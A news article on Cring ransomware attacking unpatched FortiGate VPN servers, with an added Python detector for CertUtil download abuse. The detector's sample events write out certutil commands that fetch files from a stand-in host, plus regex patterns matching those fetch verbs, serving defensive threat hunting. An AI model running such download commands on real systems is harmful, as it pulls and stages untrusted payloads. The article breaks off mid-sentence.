Unpatched vulnerable VPN servers hit by Cring ransomware

According to Kaspersky’s researchers, Cring ransomware operators are targeting unpatched Fortinet VPN devices/servers.

Kaspersky researchers identified a new ransomware strain called Cring that’s exploiting a widely reported vulnerability impacting unpatched Fortinet VPN devices. The ransomware is targeting industrial sector organizations in European countries and encrypting their networks.


In one incident, the ransomware caused a temporary shutdown of an organization’s industrial process after the server was encrypted. There is no news about how this issue was resolved.


Cring ransomware is also known as Crypt3r, Phantom, Ghost, and Vjiszy1lo. It was first discovered in January by Amigi_A and spotted by Swisscom’s CSIRT team.


How the Attack Works


After gaining initial access to the targeted network, the ransomware operators drop customized Mimikatz samples and the Cobalt Strike threat emulation framework. They then download the Cring ransomware payload onto the device using the legitimate Windows CertUtil certificate manager, a choice meant to deceive security software, and deploy it.
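One way to hunt for the CertUtil download step described above, as an added example rather than code from Kaspersky or the original article: it scans process-creation records for certutil runs that pair a fetch-capable verb with a remote URL. The event fields (modelled on Sysmon Event ID 1), hostnames and URLs are constructed, and the two verbs checked (`-urlcache`, `-verifyctl`) are an assumption about what to watch, since the article does not give the command line used.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation records (fields modelled on Sysmon Event ID 1); not incident data.
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": r"C:\Windows\System32\certutil.exe",
     "original_file_name": "CertUtil.exe",
     "command_line": r"certutil.exe -urlcache -split -f http://files.example.test/a.bin C:\Temp\a.bin"},
    {"host": "ws-02", "image": r"C:\Users\Public\cu.exe",
     "original_file_name": "CertUtil.exe",
     "command_line": r'cu.exe /verifyctl -f "https://files.example.test/b.bin"'},
    {"host": "ca-01", "image": r"C:\Windows\System32\certutil.exe",
     "original_file_name": "CertUtil.exe",
     "command_line": r"certutil.exe -verify C:\pki\issuing-ca.cer"},
    {"host": "ws-03", "image": r"C:\Windows\System32\curl.exe",
     "original_file_name": "curl.exe",
     "command_line": "curl.exe -O https://files.example.test/c.bin"},
]

# Assumed watch list: certutil verbs that can retrieve remote content ('-' or '/' prefix).
FETCH_VERB = re.compile(r"(?<!\S)[-/](urlcache|verifyctl)\b", re.IGNORECASE)
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)

def is_certutil(event):
    """Match on image name or embedded original name, so a renamed copy is still caught."""
    names = (basename(event.get("image", "")), event.get("original_file_name", ""))
    return any(n.lower() == "certutil.exe" for n in names)

def find_certutil_downloads(events):
    """Return one finding per certutil run that combines a fetch verb with a remote URL."""
    findings = []
    for ev in events:
        if not is_certutil(ev):
            continue
        # Drop quote and caret characters that can split a flag in the logged command line.
        cmd = ev.get("command_line", "").replace('"', "").replace("^", "")
        verb, url = FETCH_VERB.search(cmd), REMOTE_URL.search(cmd)
        if verb and url:
            findings.append({
                "host": ev["host"], "verb": verb.group(1).lower(),
                "url": url.group(0),
                "renamed": basename(ev.get("image", "")).lower() != "certutil.exe",
            })
    return findings

if __name__ == "__main__":
    for finding in find_certutil_downloads(SAMPLE_EVENTS):
        print(finding)
```

The routine certificate check on `ca-01` and the `curl.exe` run are deliberately left unflagged, so the rule stays quiet on normal PKI administration.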


According to Kaspersky’s research, the attackers are exploiting FortiGate SSL VPN servers that are still not patched against the CVE-2018-13379 vulnerability. Although Fortinet issued a patch last year to fix this vulnerability, many networks have not yet deployed the security update.

This vu ..
